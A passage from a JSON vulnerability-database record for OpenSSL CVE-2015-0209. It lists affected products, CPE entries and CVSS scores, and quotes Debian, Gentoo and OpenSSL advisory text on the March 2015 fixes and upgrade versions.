0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8677" }, { "model": "ctpos 6.6r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "sametime unified telephony", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.0" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.841" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.13" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.103" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.12" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "big-ip wom hf15", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm hf15", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security network controller 1.0.3376m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.9" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3379" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "netscaler service delivery appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "big-ip link controller hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip analytics hf2", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.7" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "big-ip gtm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.0.121" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.1" }, { "model": "big-ip aam", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.9" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1.1" }, { "model": "project openssl 0.9.8zf", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "session border controller for enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.10" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "flex system fc5022 16gb san scalable switch 7.2.0d5", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip pem hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.0.1" }, { "model": "abyp-2t-0s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "big-ip edge gateway hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "systems insight manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "big-ip apm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.750" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "systems insight manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "i operating system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "project openssl 1.0.0q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7.0" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.8" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ctpos 6.6r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cognos controller fp1 if2", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "icewall sso dfw r1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" } ], "sources": [ { "db": "BID", "id": "73239" }, { "db": "JVNDB", "id": "JVNDB-2015-001879" }, { "db": "NVD", "id": "CVE-2015-0209" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8ze", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-0209" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "BoringSSL project", "sources": [ { "db": "BID", "id": "73239" } ], "trust": 0.3 }, "cve": "CVE-2015-0209", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 6.8, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2015-0209", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-0209", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-0209", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0209" }, { "db": "JVNDB", "id": "JVNDB-2015-001879" }, { "db": "NVD", "id": "CVE-2015-0209" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import. Supplementary information : CWE Vulnerability type by CWE-416: Use-after-free ( Use of freed memory ) Has been identified. OpenSSL is prone to remote memory-corruption vulnerability. \nNote: This issue was previously discussed in BID 73196 (OpenSSL Multiple Unspecified Security Vulnerabilities) but has been given its own record to better document it. \nSuccessfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the application using the vulnerable library. Failed exploit attempts will result in denial-of-service conditions. This update\nreverts the defective patch applied in that update causing these\nproblems. Additionally a follow-up fix for CVE-2015-0209 is applied. \n\nMultiple vulnerabilities have been discovered in OpenSSL, a Secure\nSockets Layer toolkit. The Common Vulnerabilities and Exposures project\nidentifies the following issues:\n\nCVE-2015-0286\n\n Stephen Henson discovered that the ASN1_TYPE_cmp() function\n can be crashed, resulting in denial of service. \n\nCVE-2015-0287\n\n Emilia Kaesper discovered a memory corruption in ASN.1 parsing. \n\nCVE-2015-0292\n\n It was discovered that missing input sanitising in base64 decoding\n might result in memory corruption. \n\nCVE-2015-0209\n\n It was discovered that a malformed EC private key might result in\n memory corruption. \n\nCVE-2015-0288\n\n It was discovered that missing input sanitising in the\n X509_to_X509_REQ() function might result in denial of service. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.0.1e-2+deb7u16. Please review the\nCVE identifiers and the upstream advisory referenced below for details:\n\n* RSA silently downgrades to EXPORT_RSA [Client] (Reclassified)\n (CVE-2015-0204)\n* Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)\n* ASN.1 structure reuse memory corruption (CVE-2015-0287)\n* X509_to_X509_REQ NULL pointer deref (CVE-2015-0288)\n* PKCS7 NULL pointer dereferences (CVE-2015-0289)\n* Base64 decode (CVE-2015-0292)\n* DoS via reachable assert in SSLv2 servers (CVE-2015-0293)\n* Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)\n\nThe following issues affect OpenSSL 1.0.2 only which is not part of the\nsupported Gentoo stable tree:\n\n* OpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)\n* Multiblock corrupted pointer (CVE-2015-0290)\n* Segmentation fault in DTLSv1_listen (CVE-2015-0207)\n* Segmentation fault for invalid PSS parameters (CVE-2015-0208)\n* Empty CKE with client auth and DHE (CVE-2015-1787)\n* Handshake with unseeded PRNG (CVE-2015-0285)\n\nImpact\n======\n\nA remote attacker can utilize multiple vectors to cause Denial of\nService or Information Disclosure. \nTools such as revdep-rebuild may assist in identifying some of these\npackages. \n\nReferences\n==========\n\n[ 1 ] CVE-2015-0204\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0204\n[ 2 ] CVE-2015-0207\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0207\n[ 3 ] CVE-2015-0208\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0208\n[ 4 ] CVE-2015-0209\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0209\n[ 5 ] CVE-2015-0285\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0285\n[ 6 ] CVE-2015-0287\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0287\n[ 7 ] CVE-2015-0288\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0288\n[ 8 ] CVE-2015-0289\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0289\n[ 9 ] CVE-2015-0290\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0290\n[ 10 ] CVE-2015-0291\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0291\n[ 11 ] CVE-2015-0292\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0292\n[ 12 ] CVE-2015-0293\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0293\n[ 13 ] CVE-2015-1787\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1787\n[ 14 ] OpenSSL Security Advisory [19 Mar 2015]\n http://openssl.org/news/secadv_20150319.txt\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201503-11\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. OpenSSL Security Advisory [19 Mar 2015]\n=======================================\n\nOpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)\n=====================================================\n\nSeverity: High\n\nIf a client connects to an OpenSSL 1.0.2 server and renegotiates with an\ninvalid signature algorithms extension a NULL pointer dereference will occur. \nThis can be exploited in a DoS attack against the server. \n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a. \n\nThis issue was was reported to OpenSSL on 26th February 2015 by David Ramos\nof Stanford University. The fix was developed by Stephen Henson and Matt\nCaswell of the OpenSSL development team. \n\nReclassified: RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)\n============================================================================\n\nSeverity: High\n\nThis security issue was previously announced by the OpenSSL project and\nclassified as \"low\" severity. This severity rating has now been changed to\n\"high\". \n\nThis was classified low because it was originally thought that server RSA\nexport ciphersuite support was rare: a client was only vulnerable to a MITM\nattack against a server which supports an RSA export ciphersuite. Recent\nstudies have shown that RSA export ciphersuites support is far more common. \n\nThis issue affects OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan\nBhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen\nHenson of the OpenSSL core team. It was previously announced in the OpenSSL\nsecurity advisory on 8th January 2015. \n\nMultiblock corrupted pointer (CVE-2015-0290)\n============================================\n\nSeverity: Moderate\n\nOpenSSL 1.0.2 introduced the \"multiblock\" performance improvement. This feature\nonly applies on 64 bit x86 architecture platforms that support AES NI\ninstructions. A defect in the implementation of \"multiblock\" can cause OpenSSL\u0027s\ninternal write buffer to become incorrectly set to NULL when using non-blocking\nIO. Typically, when the user application is using a socket BIO for writing, this\nwill only result in a failed connection. However if some other BIO is used then\nit is likely that a segmentation fault will be triggered, thus enabling a\npotential DoS attack. \n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a. \n\nThis issue was reported to OpenSSL on 13th February 2015 by Daniel Danner and\nRainer Mueller. The fix was developed by Matt Caswell of the OpenSSL development\nteam. \n\nSegmentation fault in DTLSv1_listen (CVE-2015-0207)\n===================================================\n\nSeverity: Moderate\n\nThe DTLSv1_listen function is intended to be stateless and processes the initial\nClientHello from many peers. It is common for user code to loop over the call to\nDTLSv1_listen until a valid ClientHello is received with an associated cookie. A\ndefect in the implementation of DTLSv1_listen means that state is preserved in\nthe SSL object from one invocation to the next that can lead to a segmentation\nfault. Errors processing the initial ClientHello can trigger this scenario. An\nexample of such an error could be that a DTLS1.0 only client is attempting to\nconnect to a DTLS1.2 only server. \n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2a. \n\nThis issue was reported to OpenSSL on 27th January 2015 by Per Allansson. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSegmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)\n===================================================\n\nSeverity: Moderate\n\nThe function ASN1_TYPE_cmp will crash with an invalid read if an attempt is\nmade to compare ASN.1 boolean types. Since ASN1_TYPE_cmp is used to check\ncertificate signature algorithm consistency this can be used to crash any\ncertificate verification operation and exploited in a DoS attack. Any\napplication which performs certificate verification is vulnerable including\nOpenSSL clients and servers which enable client authentication. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered and fixed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nSegmentation fault for invalid PSS parameters (CVE-2015-0208)\n=============================================================\n\nSeverity: Moderate\n\nThe signature verification routines will crash with a NULL pointer\ndereference if presented with an ASN.1 signature using the RSA PSS\nalgorithm and invalid parameters. Since these routines are used to verify\ncertificate signature algorithms this can be used to crash any\ncertificate verification operation and exploited in a DoS attack. Any\napplication which performs certificate verification is vulnerable including\nOpenSSL clients and servers which enable client authentication. \n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\n\nThis issue was was reported to OpenSSL on 31st January 2015 by Brian Carpenter\nand a fix developed by Stephen Henson of the OpenSSL development team. \n\nASN.1 structure reuse memory corruption (CVE-2015-0287)\n=======================================================\n\nSeverity: Moderate\n\nReusing a structure in ASN.1 parsing may allow an attacker to cause\nmemory corruption via an invalid write. Such reuse is and has been\nstrongly discouraged and is believed to be rare. \n\nApplications that parse structures containing CHOICE or ANY DEFINED BY\ncomponents may be affected. Certificate parsing (d2i_X509 and related\nfunctions) are however not affected. OpenSSL clients and servers are\nnot affected. \n\nThis issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0\nand 0.9.8. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should 